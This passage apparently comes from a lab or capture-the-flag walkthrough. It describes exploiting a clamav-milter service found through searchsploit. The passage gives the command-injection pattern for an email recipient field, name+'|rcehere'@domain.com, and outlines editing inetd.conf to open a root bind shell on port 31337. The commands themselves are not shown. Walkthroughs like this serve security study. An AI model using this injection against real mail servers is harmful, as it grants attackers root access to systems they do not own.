We see a service clamav-milter running with blackhole args. If we lookup this service in searchploit we will find an RCE exploit associated with it we can attempt:

After reading the exploit we can see that its RCE via the forwarding name+“|rcehere”@domain.com field, so we manually exploit it by editing the inetd conf to open an interact root shell on port 31337 and then restarting the service to spawn the bind shell:
